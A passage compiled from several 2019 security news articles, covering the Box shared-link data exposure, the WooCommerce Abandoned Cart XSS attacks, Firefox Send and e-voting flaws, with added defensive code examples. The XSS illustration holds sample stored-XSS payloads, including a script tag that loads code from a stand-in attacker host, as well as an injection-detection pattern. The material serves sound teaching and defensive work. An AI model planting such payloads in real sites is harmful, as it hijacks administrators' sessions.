STE WILLIAMS

Misconfigured Box accounts leak terabytes of companies’ sensitive data

If your company uses Box for cloud-based file sharing, security researchers are advising you to stop reading right now and immediately disable public file sharing: vanity-named subdomains and URLs are “easily brute-forceable,” leaving companies’ publicly shared data open to extremely easy attacks.

Security firm Adversis published a report on Monday after using a “relatively large” wordlist to uncover hundreds of Box customers’ subdomains, through which they could access hundreds of thousands of documents and terabytes of extremely sensitive data.

A sampling of what the researchers found:

  • Hundreds of passport photos
  • Social Security and bank account numbers
  • High-profile technology prototype and design files
  • Lists of employees
  • Financial data, invoices, internal issue trackers
  • Customer lists and archives of years’ worth of internal meetings
  • IT data, VPN configurations, network diagrams

Adversis says its initial impulse was to reach out to all the affected companies, but the scale of the task ruled that out. After finding that a large percentage of Box customer accounts that it tested had thousands of exposed, sensitive documents, the firm alerted some of those companies, gave Box a heads-up – that was on 24 September – and published its report.

As Box Chief Customer Officer Jon Herstein said in a blog post on Sunday, Box offers various ways for its customers to allow content sharing both between employees and outside the company.

Data stored in Box enterprise accounts is private by default. But in order to make it easy for its customers to share content with large groups – be it privately or publicly – Box offers the “Custom Shared Link” feature, which enables its customers to customize the default secure shared links so they’re easier to find. Box gives the example of a car company that wants to distribute public press releases for a product launch: you can see where the car company would like the idea of customizing the URL to read something like this: https://carcompanyname.app.box.com/v/pressrelease

This is neither a bug nor a vulnerability, mind you. It’s simply a way to easily make data publicly accessible with a single link. In fact, Adversis noted, it was called out as an easy attack method back in June 2018:

The problem: with this type of predictable URL formulation, these “secret” links are easy to discover. So that’s what Adversis did: its researchers whipped up a script to scan for and enumerate Box accounts using lists of company names and wildcard searches. It easily found Box customer accounts by checking https://companyname.account.box.com. If that link returned a target company’s logo, that meant it was a paying customer and was “probably susceptible,” the firm said.

Then, the researchers sat back and watched the wave come in:

At that point, we began brute forcing folder and file names which began returning results faster than we could review them.

Much of the data, found leaking in subdomains of dozens of companies, was harmless, in that it was meant to be public. But then too, there was all that “oh, dear!” data:

These included passport photos, prototype details with raw CAD files for some very prominent new and coming tech, Social Security Numbers, financial documents, internal IT data including network diagrams and asset information, and innumerable “confidential” slide decks.

Who’s leaking data?

Adversis says it contacted a “small minority” of affected companies and vendors, most of which promptly closed the leak. Box acknowledged the issue and updated its file-sharing guidelines.

Adversis gave TechCrunch a list of some of the exposed Box accounts, and the publication contacted several of the big names on that list. Those big companies represent a smorgasbord of industries: from a flight reservation system maker, on to a nonprofit that handles corpse donations, a TV network, Apple (though the tech behemoth apparently only exposed what looked like non-sensitive internal data, such as logs and regional price lists), and more.

The data exposed included default passwords and, in some cases, backdoor access passwords in case of forgotten passwords; a PR firm’s detailed proposal plans and more than a dozen resumes of potential staff for the project, including names, email addresses, and phone numbers.

That list of exposed accounts included even Box itself. From TechCrunch:

Box, which initially had no comment when we reached out, had several folders exposed. The company exposed signed non-disclosure agreements on their clients, including several U.S. schools, as well as performance metrics of its own staff, the researchers said.

What to do

Box recommended making these changes to deal with the issue of URL guessing and subsequent leakage:

  • Administrators configure Shared Link default access to ‘People in your company’ to reduce accidental creation of public (open) links by users.
  • Administrators regularly run a shared link report (as described here) to find and manage public custom shared links.
  • Security Administrators leverage third-party SIEM or log tools to consistently review suspicious content activity across your enterprise.
  • Users do not create public (open) custom shared links to content that is not intended for public consumption.
  • Users only post shared content with open shared links on public web pages if you want the content to be indexed by Google and available for public consumption.
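
The shared-link review Box recommends in the second bullet, as a worked example. This is added code, not Adversis’s PandorasBox and not anything from Box: it takes a constructed shared-link report whose rows are modelled on the Box API’s shared_link object (access, url, vanity_url; check these against the columns of your own export), treats every “open” link on content that is not public by design as a finding, and ranks guessable custom URLs above random ones.

```javascript
// Added example (not Adversis's PandorasBox, not Box code): audit a shared-link
// report for public ("open") links. Row shape is modelled on the Box API's
// shared_link object (access, url, vanity_url); verify against your own export.
// Every row below is constructed sample data, not a real account.

const SAMPLE_REPORT = [
  { item: "press-release-2019.pdf", owner: "pr@example.com",
    shared_link: { access: "open", url: "https://example.app.box.com/s/8f1k2m",
                   vanity_url: "https://example.app.box.com/v/pressrelease" } },
  { item: "network-diagram.vsdx", owner: "it@example.com",
    shared_link: { access: "open", url: "https://example.app.box.com/s/q9zt7p",
                   vanity_url: "https://example.app.box.com/v/netdiagram" } },
  { item: "q3-invoices.xlsx", owner: "finance@example.com",
    shared_link: { access: "open", url: "https://example.app.box.com/s/x2v8nw",
                   vanity_url: null } },
  { item: "staff-handbook.docx", owner: "hr@example.com",
    shared_link: { access: "company", url: "https://example.app.box.com/s/h5d3aa",
                   vanity_url: "https://example.app.box.com/v/handbook" } },
  { item: "board-minutes.docx", owner: "ceo@example.com", shared_link: null },
];

// Allow-list of content that is meant to be public (assumed; maintain your own).
const PUBLIC_BY_DESIGN = new Set(["press-release-2019.pdf"]);

function classifyLink(row) {
  const link = row.shared_link;
  if (!link) return { severity: "none", reason: "not shared" };
  if (link.access !== "open") return { severity: "none", reason: `access is '${link.access}'` };
  if (PUBLIC_BY_DESIGN.has(row.item)) return { severity: "info", reason: "open by design" };
  // Open link on non-public content: a custom URL is guessable from a wordlist,
  // a random /s/ token is only exposed if the link itself leaks.
  if (link.vanity_url) return { severity: "high", reason: "open link with guessable custom URL" };
  return { severity: "medium", reason: "open link with random URL" };
}

// Returns one finding per row that has an open link.
function auditSharedLinks(rows) {
  return rows
    .map((row) => ({ item: row.item, owner: row.owner, ...classifyLink(row) }))
    .filter((f) => f.severity !== "none");
}

function summarize(findings) {
  const counts = { high: 0, medium: 0, info: 0 };
  for (const f of findings) counts[f.severity] += 1;
  return counts;
}

if (typeof require !== "undefined" && require.main === module) {
  const findings = auditSharedLinks(SAMPLE_REPORT);
  for (const f of findings) {
    console.log(`[${f.severity.toUpperCase()}] ${f.item} (${f.owner}): ${f.reason}`);
  }
  console.log(summarize(findings));
}
```

The “high” findings are the ones to close first: an open link with a custom URL is exactly the combination the wordlist scan hits, while a “company” or “collaborators” link is not reachable by URL guessing at all.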

Box says it’s working on improving Box security by…

  • Adding more user education to the link settings tool on Box to make the potential implications of public link access even more clear, and advising that no sensitive content ever be shared with this level of permission.
  • Improved admin policies for public shared links, including changing the default setting in the Box Admin console to disable public custom shared link URLs until a company Box Admin decides to enable them; and setting the default access level for shared links in the Admin console to “people in your company.” That default can only be changed by a company’s Box Admin. As a result, in a default configuration of Box, end users will need to expressly change the shared link setting to “people with the link” to make the link externally accessible.
  • More stringent controls to reduce unintended content access. Box says it’s working on a variety of methods to limit the unintended discovery of open/public links and prevent content access by external parties.

For its part, Adversis has open-sourced and published the scanning tool it used to find the exposed accounts. Aptly enough, the tool’s name is PandorasBox.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/DQNVPkrRHYM/

Update now! WordPress abandoned cart plugin under attack

Hackers have been spotted targeting websites running unpatched versions of the WordPress plugin Abandoned Cart for WooCommerce.

According to a blog post written by Mikey Veenstra of WordPress firewall company Defiant (formerly Wordfence), the attacks exploit a cross-site scripting (XSS) flaw in version 5.1.3 of the plug-in, which is designed to help site admins analyse and recover sales lost when shoppers abandon carts.

Affecting both paid and free versions of the software, the vulnerability is used to install two backdoors that compromise the site, the second a sneaky backup in case the site owners detect and disable the first.

The attack involves the hackers creating a cart containing bogus contact information, which is then abandoned. When the data in these fields is viewed by a site admin, a lack of output sanitisation means that the billing_first_name and billing_last_name fields become a single customer field containing an injected JavaScript payload.

This uses the admin’s browser session to deploy the backdoors, starting with a rogue admin account added using a hidden iframe which triggers new account creation, at which point a notification of success is sent via the attacker’s command and control.

The second backdoor is then added by opening another iframe to the plugins menu, which is scanned for any with an ‘activate’ link denoting that they are inactive. This is injected with a PHP backdoor script and lies dormant until the attackers decide to activate it.
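
An added illustration of the output-sanitisation gap described above (not the plugin’s PHP and not Defiant’s analysis code): a constructed abandoned-cart record carries script markup in the billing_first_name and billing_last_name fields, and the combined customer cell is rendered once without escaping and once with an HTML-escaping step that does for this sketch what WordPress’s esc_html()/esc_attr() do in a real plugin.

```javascript
// Added example (not the plugin's code): the same record rendered two ways.
// The constructed cart row carries a script payload in the name fields, the
// pattern the article describes; the vulnerable renderer concatenates the raw
// values into HTML, the hardened renderer escapes them at the point of output.

// Constructed sample record, as captured from a guest checkout that was abandoned.
const SAMPLE_CART = {
  billing_first_name: 'Jane<script src="https://attacker.invalid/x.js"></script>',
  billing_last_name: 'Doe" onmouseover="alert(1)',
  billing_email: "jane@example.com",
};

// Escape the five characters that can break out of HTML text or a quoted attribute.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: untrusted values go into the admin page as-is, so the stored
// payload runs in the administrator's browser session when the list is viewed.
function renderCustomerUnsafe(cart) {
  const customer = `${cart.billing_first_name} ${cart.billing_last_name}`;
  return `<td class="customer" title="${customer}">${customer}</td>`;
}

// Hardened: the value is escaped for both the attribute and the text-node context.
function renderCustomerSafe(cart) {
  const customer = `${cart.billing_first_name} ${cart.billing_last_name}`;
  const escaped = escapeHtml(customer);
  return `<td class="customer" title="${escaped}">${escaped}</td>`;
}

// Structural checks used to compare the two outputs: a correctly escaped cell
// contains exactly the four angle brackets and four quote characters of the
// <td> element we wrote ourselves, and nothing from the untrusted input.
function rawAngleBrackets(html) {
  return (html.match(/[<>]/g) || []).length;
}

function rawQuotes(html) {
  return (html.match(/"/g) || []).length;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("unsafe:", renderCustomerUnsafe(SAMPLE_CART));
  console.log("safe:  ", renderCustomerSafe(SAMPLE_CART));
}
```

The point of counting brackets and quotes rather than searching for the word “script” is that the dangerous property is structural: any raw `<`, `>` or `"` from user data that survives into the page can change the markup, whatever the payload happens to spell.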

How many sites have been targeted?

In an interview with ZDNet, Veenstra said Defiant had detected 5,251 accesses to a bit.ly link associated with the attacks.

This exaggerated the true number of active infections, while possibly underestimating the number of inactive ones (i.e. those in place but not yet triggered).

That makes the numbers game a bit of a guess, but it could be anything from the low hundreds to the low thousands out of the estimated 20,000-plus installations that have downloaded the plugin.

Working out how many attacks have been successful is even harder because Defiant only detects attacks as it repels them using its Wordfence firewall. More mysterious still is the attackers’ ultimate objective in executing the compromises.

What to do

The flaw was fixed on 18 February with the release of version 5.2.0, which “added sanitization checks for checkout field capture for guest users.” Anyone using the plugin should update to this version, or later, as soon as possible.

However, according to Defiant, this doesn’t address the secondary backdoor affecting inactive plugins. The company’s recommendation is to review all databases for possible injections.

After this check has been completed, review the user accounts present on your site. If any unauthorized administrator accounts are present, delete them immediately and begin your incident response process.
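
An added example of the two review steps above, not Defiant’s tooling: it runs over constructed rows shaped like WordPress’s wp_users table joined with the wp_capabilities value from wp_usermeta, and over constructed captured-checkout rows using the billing_first_name and billing_last_name fields named in the article. The table layout, the baseline list of legitimate administrators and every value are assumptions.

```javascript
// Added example (not Defiant's code): post-compromise review over constructed
// data. Column names follow the standard WordPress schema (wp_users,
// wp_usermeta.meta_key = 'wp_capabilities'); all row values are invented.

// Baseline of administrators you expect to exist (assumed; keep yours outside the site).
const KNOWN_ADMINS = new Set(["siteowner"]);

// Constructed wp_users rows joined with each user's wp_capabilities meta value.
const SAMPLE_USERS = [
  { ID: 1, user_login: "siteowner", user_email: "owner@example.com",
    user_registered: "2018-04-02 10:11:12", wp_capabilities: 'a:1:{s:13:"administrator";b:1;}' },
  { ID: 7, user_login: "editor_amy", user_email: "amy@example.com",
    user_registered: "2018-09-14 08:00:00", wp_capabilities: 'a:1:{s:6:"editor";b:1;}' },
  { ID: 42, user_login: "wpupdateuser", user_email: "noreply@mailbox.invalid",
    user_registered: "2019-03-09 03:27:51", wp_capabilities: 'a:1:{s:13:"administrator";b:1;}' },
];

// Constructed abandoned-cart captures, the rows an admin sees in the plugin's list.
const SAMPLE_CARTS = [
  { id: 101, billing_first_name: "Sam", billing_last_name: "Lee", captured: "2019-03-01 12:00:00" },
  { id: 102, billing_first_name: '<script src="https://attacker.invalid/p.js">',
    billing_last_name: "</script>", captured: "2019-03-09 03:20:07" },
  { id: 103, billing_first_name: 'x" onerror="alert(1)', billing_last_name: "y",
    captured: "2019-03-09 03:21:40" },
];

// Roles are stored PHP-serialised; the administrator role appears as this literal key.
function isAdministrator(capabilities) {
  return /s:13:"administrator";b:1;/.test(capabilities);
}

// Step 2 of the recommendation: administrators that are not in the baseline.
function unexpectedAdmins(users) {
  return users.filter((u) => isAdministrator(u.wp_capabilities) && !KNOWN_ADMINS.has(u.user_login));
}

// Step 1: markup, event-handler attributes or a javascript: URL have no place in a name field.
const INJECTION_PATTERN = /<\/?[a-z]|\bon[a-z]+\s*=|javascript:/i;

function injectedCartRows(carts, fields = ["billing_first_name", "billing_last_name"]) {
  return carts.filter((c) => fields.some((f) => INJECTION_PATTERN.test(String(c[f] ?? ""))));
}

// Combined report; a non-empty result in either list is the trigger for
// incident response rather than just a cleanup.
function reviewSite(users, carts) {
  return {
    unexpectedAdmins: unexpectedAdmins(users).map((u) => ({ ID: u.ID, user_login: u.user_login,
                                                           user_registered: u.user_registered })),
    injectedCarts: injectedCartRows(carts).map((c) => ({ id: c.id, captured: c.captured })),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(reviewSite(SAMPLE_USERS, SAMPLE_CARTS), null, 2));
}
```

The timestamps are kept in the output on purpose: the registration time of a rogue administrator and the capture time of the poisoned cart rows bracket the moment an administrator viewed the list, which is the starting point for the rest of the incident timeline.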

As with previous WordPress/plugin vulnerability incidents, the issue of updating is never far from the surface.

A recent report by Sucuri noted that the biggest risk to most CMSs is plugins, themes and extensions, which tend to be installed and then not updated often enough.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/Pv68INM-x5E/

This is the Send, encrypted end-to-end, this is the Send, my Mozillan friend

Mozilla’s Firefox Send, a free encrypted file sharing service, graduated from test to official release on Tuesday after a year and a half of refinement.

Available on the web at send.firefox.com and soon through an Android app, Send first appeared in August 2017 as a way to encrypt local files and store them on Mozilla’s servers, provided by AWS, for retrieval with a one-time use URL.

The generated URL, displayed in the browser or app after the file has been locally encrypted and uploaded, is meant to be shared with the intended recipient of the file via email, instant messaging or other means.

Initially, Send supported files of up to 1GB, which it made available as downloads through the generated URL. And after one use, the link no longer functioned.

The official release maintains the 1GB size limit but supports up to 2.5GB for users signed in to a free Firefox Account. It also expands the number of times the shared file can be downloaded.

Users can now select from a handful of possible times a link can be used – 1, 2, 3, 4, 5, 20, 50, 100. File availability is also limited by time, depending upon which preset menu value is selected – 5 minutes, 1 hour, 1 day, and 7 days. These settings, however, can be changed to arbitrary values in the loaded HTML for the page prior to submission using Chrome’s Inspect option or Firefox’s Inspect Element.

“Send uses end-to-end encryption to keep your data secure from the moment you share to the moment your file is opened,” said Nick Nguyen, Mozilla’s VP of Firefox Product, in a blog post.

“It also offers security controls that you can set. You can choose when your file link expires, the number of downloads, and whether to add an optional password for an extra layer of security.”

On the inside

The service relies on the Web Crypto JavaScript API with the 128-bit AES-GCM algorithm to encrypt files locally before they’re sent to the cloud.

“Send uses the Encrypted Content Encoding defined in RFC8188 to encrypt files,” a Mozilla spokesperson explained in an email to The Register. “We generate a random 256-bit key that gets included in the hash portion of the share URL so that it can be shared without us (Mozilla) knowing what it is.”

The 128-bit AES-GCM key is used for the file and file metadata; the HMAC SHA-256 signing key is used for request authentication, as can be seen in the source code.

Mozilla also collects a limited amount of client and server information during Send interactions, detailed on its metrics page and in its privacy notice.

The anchor tag of the URL – the part after the # – contains the decryption key, which isn’t typically sent to the server but can be extracted via JavaScript. If the Send page is compromised, or if Mozilla decides to capture user keys, anyone in control of the Send application code could potentially modify it to read a submitted key via the browser’s window.location.hash variable.

However, Mozilla has made the source code available. So if using Mozilla’s version of Send, which runs atop Google Cloud Platform, seems too risky, users have the option to run their own instance on other cloud services like AWS (which hosted Send initially) or on a local machine sporting Node.js 10+.

The Register asked whether Mozilla does any sort of file hashing to check uploaded images against known unlawful content. Mozilla’s spokesperson didn’t have an immediate answer about that but said using Send for illegal purposes is against the company’s terms of service.

The browser maker does occasionally receive subpoenas in conjunction with the use of its services and publishes a limited amount of information about this in its periodic transparency reports.

In countries where technology providers can be forced to provide technical assistance to authorities, there may be additional threat scenarios.

For Mozilla, Send represents a way to encourage people to create Firefox Accounts and to build a relationship with people who make informed technology choices (as opposed to those who use whatever is installed by default and don’t care about their tools). Services like Send may end up becoming more important to Mozilla as the seemingly irresistible gravity of Google Chrome pulls people away from Firefox.

There are already many ways to send files with varying degrees of security, some more verifiable than others. These include Ceph, Signal, WhatsApp, DropSecure, OnionShare, Cryptomator and wormhole, to say nothing of the big cloud companies’ file storage services or protocols like SFTP. What Send offers is simplicity from a fairly trusted brand and the power to run the code yourself if you’re so inclined. ®

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/13/mozilla_send_/

Swiss electronic voting system like… wait for it, wait for it… Swiss cheese: Hole found amid public source code audit

The Swiss Federal Chancellery (SFC) on Tuesday said security researchers have found a fascinating flaw in the Swiss Post’s e-voting system as part of an ongoing penetration test.

Said flaw, if successfully exploited by miscreants, would prevent officials from detecting unauthorized changes to citizens’ electronically-cast votes.

Swiss authorities released the source code of their computer-based voting system and began a public audit of their blueprints on February 25, 2019, to identify vulnerabilities and fix them. The test is scheduled to run until March 24, 2019.

The flaw in the sVote protocol, developed by technology provider Scytl, has to do with universal verifiability, the mathematical proofs that prevent vote manipulation.

“While the flaw does not allow the system to be penetrated, the researchers were able to demonstrate that the system does not generate conclusive mathematical proofs to identify whether any manipulation has taken place,” the SFC said. “This means that it is not possible to detect whether the votes have been tampered with.”

Researchers Sarah Jamie Lewis, Olivier Pereira, and Vanessa Teague, from the Open Privacy Research Society, Catholic University of Leuven, and the University of Melbourne respectively, describe the issue in a research paper published in conjunction with the SFC announcement.

They explain that the Swiss Post voting technology provides a mechanism – a mixnet – to shuffle electronically-submitted votes for the sake of privacy. The shuffling process encrypts the vote data, and is supposed to prove that the vote sets before and after shuffling are the same. But it fails to do so.

Proof

“We show that the mixnet specification and code recently made available for analysis does not meet the assumptions of a sound shuffle proof and hence does not provide universal or complete verifiability,” the researchers explain.

They note that other researchers, Thomas Haines of the Norwegian University of Science and Technology and Rolf Haenni of Bern University of Applied Sciences, independently identified this flaw.

That may be because the problem was identified in 2017. According to Swiss Post, Scytl, which is responsible for the source code, failed to fully fix the bug.

“Swiss Post regrets this and has asked Scytl to make the correction in full immediately, which they have done,” the organization said in a statement. “The modified source code will be applied with the next regular release.”

Scytl in a statement said it has received 67 reports from hackers participating in the penetration test, one of which is the mixnet flaw. “The code has already been updated by using the random verifiable mechanism that was already implemented in the voting system but had not been activated,” the company said.

The missing audit mechanism hasn’t been an issue in Swiss elections because the system has never been used in actual voting, according to Swiss Post. The cantons of Thurgau, Neuchâtel, Fribourg and Basel-Stadt currently use a different e-voting system.

Switzerland intends to consider the results of its test when it wraps up later this month and present a report, at which point the SFC will determine whether further changes to the new e-voting system are necessary. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/12/swiss_evoting_system_vulnerability/

Yelp-for-MAGAs app maker is warned there are holes in its code. Does it A. Just fix the problem, or B. Threaten to call the FBI, too?

A developer specializing in mobile apps for US conservatives is under fire for threatening to call the Feds on someone who reported security shortcomings in its software.

On Tuesday, a French infosec bod, going under the Mr Robot-themed pseudonym Elliot Alderson and handle fs0c131y, notified 63red that it had left hard-coded credentials in its Yelp-for-Trumpistas smartphone application, and that whoever built its backend APIs had forgotten to implement any meaningful form of authentication.

63red made headlines earlier this month when it launched the app, which lets users rate and share details of businesses that are friendly to conservatives. In particular, if a restaurant, bar, or whatever, and its patrons, don’t mind you wearing a red Make America Great Again hat, they can be highlighted as such in 63red’s app.

Alderson poked around inside the Android build of the app and spotted a few insecure practices, including the username and password of the programmer, and a lack of authentication on its backend APIs, allowing anyone to pull up user account information and potentially slurp the app’s entire user database. It’s also possible to insert data into the backend log files, we’re told.

The reaction from 63red was far from gracious. The biz responded by accusing the researcher of carrying out a “politically motivated attack,” and promised to report the matter to the FBI.

“We see this person’s illegal and failed attempts to access our database servers as a politically-motivated attack, and will be reporting it to the FBI later today,” 63red’s statement reads. “We hope that, just as in the case of many other politically-motivated internet attacks, this perpetrator will be brought to justice, and we will pursue this matter, and all other attacks, failed or otherwise, to the utmost extent of the law.”

63red described the privacy issues as a “minor problem,” and noted that no user passwords were exposed nor any user data changed.

Alderson said he is not particularly worried about the threats, noting that he did not have to break into any systems nor commit any crime to see data that the developer had left out in the open.

“The FBI threat is a threat, I didn’t do anything illegal,” he told The Register. “I didn’t break or hack anything. Everything was open.”

Meanwhile, members of the infosec community are raking the app developer over the coals for its handling of the vulnerability report.

The Register has asked 63red for further comment on the matter and an update on its communications with the FBI, but has yet to hear back at the time of publication. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/12/63red_security_freakout/

Microsoft changes DHCP to ‘Dammit! Hacked! Compromised! Pwned!’ Big bunch of security fixes land for Windows

Patch Tuesday It’s the second Tuesday of the month, and you know what that means: a fresh dump of security fixes from Microsoft, Adobe and others.

The March edition of Patch Tuesday includes fixes for 64 CVE-listed vulnerabilities, while Adobe addressed a pair of bugs in Photoshop and Digital Editions. Even SAP has got in on the game.

DHCP flaws headline Patch Tuesday priorities

Of the 64 bugs squashed in Redmond’s March update, researchers are pointing to five particular bugs as being especially noteworthy.

First, there is the trio of CVE-2019-0697, CVE-2019-0698, and CVE-2019-0726, all covering holes present in the DHCP server component for Windows. Each of the flaws would potentially allow an attacker on the local network to achieve remote code execution on a targeted machine simply by sending a malformed DHCP network packet.

“These bugs are particularly impactful since they require no user interaction – an attacker sends a specially crafted response to a client – and every OS has a DHCP client,” explained Dustin Childs of the Trend Micro Zero Day Initiative.

“There would likely need to be a man-in-the-middle component to properly execute an attack, but a successful exploit would have wide-ranging consequences.”

There’s no indication that the DHCP flaws are being exploited in the wild, but two other patches in this month’s bundle cover bugs that are already being used by online criminals. CVE-2019-0797 and CVE-2019-0808 are a pair of elevation-of-privilege flaws that have been detected in active use.

Childs also recommends admins make sure to test and install CVE-2019-0603, a remote code execution flaw in WDS TFTP server, and CVE-2019-0757, a package tampering flaw in NuGet.

Four of the flaws, CVE-2019-0683, CVE-2019-0754, CVE-2019-0757, and CVE-2019-0809, had already been publicly exposed. Only CVE-2019-0809, an input validation flaw in Visual Studio C++, would allow for remote code execution and should be tackled as soon as possible.

As is usually the case, Microsoft’s browser scripting engines accounted for the lion’s share of the critical fixes. The scripting engines in Edge, Internet Explorer, and VBScript (also used for ActiveX extensions in IE and Office) each received patches for vulnerabilities that would allow remote code execution simply by convincing the mark to visit a poisoned web page or open an Office Doc.

Devs and admins using Windows Subsystem for Linux will want to pay attention to CVE-2019-0682, CVE-2019-0689, CVE-2019-0692, CVE-2019-0693, CVE-2019-0694, five elevation of privilege flaws that could be exploited through poisoned applications.

Adobe touches up Photoshop, Digital Editions

Just two updates were kicked out from Adobe today, covering only one flaw. The problem is that it appears in two separate apps.

For Photoshop CC on Windows and MacOS, the update will close up CVE-2019-7095, a heap corruption bug that would allow for arbitrary code execution on a vulnerable machine.

The same flaw is also present in Digital Editions, prompting Adobe to update that suite as well.

SAP stands for Significantly Annoying Pwnage

Those admins running SAP software are going to have a bit more to deal with today, as the enterprise computing giant dropped 15 of its own security notes.

Just two of those, an XML External Entity bug in HANA Extended Application Services and a cross-site scripting flaw in NetWeaver Java Application Server, were serious enough to warrant ‘high’ severity ratings but the rest should be fixed as soon as possible. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/12/march_patch_tuesday_dhcp/

Box Mistakes Leave Enterprise Data Exposed

User errors in enterprise Box accounts have left hundreds of thousands of sensitive documents exposed to thieves and peeping toms.

Sharing public links to private files in Box enterprise storage can lead to more than productive collaboration: it can expose sensitive data to anyone with a search engine and a well-formed query.

Security firm Adversis discovered hundreds of Box customers who had hundreds of thousands of documents and terabytes of data exposed. In the blog post announcing the find, Adversis said it originally intended to notify all the companies whose data they found, but the scale of the discovery quickly made that impossible.

This is not a bug in Box, the researchers said: It’s an advertised feature that’s working precisely as it should but was misconfigured by users. Tech blog TechCrunch worked with Adversis and found large, public companies that had exposed millions of customer names, email addresses, phone numbers, and other sensitive information. When contacted, those companies took the sensitive information offline.

In a statement to Dark Reading, Pravin Kothari, CEO of CipherCloud said, “A single misconfiguration can cause havoc as all your sensitive information could be exposed to the public or hackers by a user’s inadvertent action. Not only do you have to deal with reputational damage, but if the exposed data had regulatory requirements then you’re also looking at stiff penalties.”

Box spokesperson Denis Roy told Tech Crunch: “We are taking steps to make these settings more clear, better help users understand how their files or folders can be shared, and reduce the potential for content to be shared unintentionally, including both improving admin policies and introducing additional controls for shared links.”

Article source: https://www.darkreading.com/cloud/box-mistakes-leave-enterprise-data-exposed/d/d-id/1334137?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

How the Best DevSecOps Teams Make Risk Visible to Developers

DevOps-minded CISOs say enterprise security teams need to do a better job scoring and visualizing risk for developers and business executives.

One of the biggest challenges security practitioners and leaders face in their mission to embed application security (AppSec) into the software development life cycle is a lack of engagement from developers. Leaders in DevSecOps teams who’ve tackled this challenge say that contrary to popular belief among cybersecurity pros, the root problem has nothing to do with developer apathy.  

Instead, they say that security has done a lousy job making AppSec risks truly visible to developers — and to the line of business.

More fundamentally, traditional cybersecurity practices are not providing the kind of actionable feedback to developers that helps them figure out how to make changes in their daily work that will actually reduce AppSec risk. On the flip side, providing this kind of metrics-driven security feedback is where the DevSecOps approach truly excels, as shown by a number of key practices shared last week at the RSA Conference (RSAC) by security leaders from the likes of Target, Comcast, Mastercard, and Highmark Health.

“We fundamentally believe that developers want to create secure applications, and it is our job as security practitioners to make that as easy as possible for them to do,” said Jodie Kautt, vice president of cybersecurity for Target. 

Kautt was one of several DevOps-minded security leaders to take the podium as a part of the DevSecOps Days program at RSAC, in which a key theme that bubbled up was how mature DevSecOps teams are making metrics more relatable and contextualized for developers and business stakeholders. What these teams realized is that laundry lists of unresolved vulnerabilities and huge, dusty policy tomes simply do not move the needle on developer behavior.

As an alternative, they shared a number of tips and best practices to start driving risk discussions based on data and business context.

Let Data Be Your Guide
Getting the security message across to developers, operations staff, application owners, and business leadership doesn’t have to be an uncrackable problem, said Anna Marie Zettlemoyer, vice president of security engineering for Mastercard. The best risk leaders make their case by finding the right metrics to tell their story. 

“Let data be your guide, part of your analysis, and part of your influence,” Zettlemoyer said. “Even when teams don’t speak the same language and we just aren’t understanding each other, the data can be a really great common denominator. People might not trust you at first, but they will trust the numbers.”

Use Audience-Centric Metrics
But not just any numbers will do. They’ve also got to be audience-centric to really make an impact, said Omar Khawaja, CISO for Highmark Health. 

“If I’m going up in front of the board, do you think I’m going to present to them the number of vulnerabilities in our applications? Do you think the board even knows what that means?” he said. “No, they care about business risk.”

He said it’s much more valuable for security people like himself to partner with business continuity staff and application owners, cross-reference the vulnerability statistics against the business criticality of the affected applications to give the numbers context, and then simplify the scoring so that it is possible to show the state of security in the most critical apps. Similarly, Zettlemoyer said security leaders should be developing metrics that, as much as possible, show the bottom-line impact of security risks.

“So, make friends with your accountants to help you figure out where that impact is going to be on the balance sheet,” she suggested. 

Establish Transparent Risk Scoring
Some organizations, including Target, have evolved the contextualization and simplification of security metrics by developing consistent application risk scoring. At Target, the security team developed what the company calls the Product Intelligence score, which wraps in data from its vulnerability databases, GRC tooling, application management systems, dynamic scanning information, penetration tests, and the like. It weighs the output from those systems against business criticality of the application being scored, and also accounts for things such as the types of security services used by the development team and whether or not the team has a trained “Security Ninja,” or security champion, in its ranks. The output of all of that information is a single score that ranges anywhere from 300 to 850. 

“It all comes down to one number — think of that number as your credit score,” said Kautt, who explained that this score makes it easy to measure product and application teams across the board at the company, and to show visible security gains made over time on each application. 

Key to simplifying with scoring is being extremely open about how the scores are developed. 

“The score is transparent,” said Jennifer Czaplewski, director of product security for Target. “We give them all of the information that they need so they don’t just have to trust us that their score is 745 but that they can see for themselves how it was derived.”

Creating Simplified Dashboards
The transparency of Target’s Product Intelligence score is delivered through a dashboard that links to the data sources that Czaplewski and Kautt mentioned. In addition, the dashboard contextualizes how an application’s Product Intelligence score compares with other applications in the Target portfolio. Another crucial element is that it visualizes and explains what teams need to do to start improving their scores. 

“It’s not just the simplicity of the number that has made this so successful for us, but it’s that we highlight which actions teams can take in order to improve their Product Intelligence,” Kautt said. She and Czaplewski said they’ve done all of this with just a pair of software engineers and open source tooling from Apache Superset.
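The scoring described above, from Khawaja’s point about cross-referencing vulnerability counts against business criticality through Target’s 300-to-850 Product Intelligence score, its auditable breakdown and its ranked list of score-improving actions, can be reduced to a small, transparent function. The block below is an added illustration written for this article, not Target’s or Comcast’s own code; the evidence fields, the penalty and credit weights, the criticality multiplier and the raw-to-850 mapping are all assumptions chosen to show the shape of such a score, and the sample application is constructed.

```python
from dataclasses import dataclass, field, replace


@dataclass
class AppEvidence:
    """Evidence about one application, pulled from the systems the score wraps in.
    Field names and inputs are assumptions for this example, not Target's schema."""
    name: str
    business_criticality: int                      # 1 (low) .. 5 (crown jewel), from the app inventory / GRC tool
    open_vulns: dict = field(default_factory=dict)  # severity -> open count, from the vulnerability database
    dast_findings: int = 0                         # unresolved dynamic-scan findings
    pentest_findings: int = 0                      # unresolved penetration-test findings
    security_services: frozenset = frozenset()     # services the team has adopted, e.g. {"sast", "sca"}
    has_champion: bool = False                     # a trained security champion sits on the team


# Assumed weights (not Target's): penalties per open finding, credits for good practice.
SEVERITY_PENALTY = {"critical": 60, "high": 25, "medium": 5, "low": 1}
DAST_PENALTY = 8
PENTEST_PENALTY = 30
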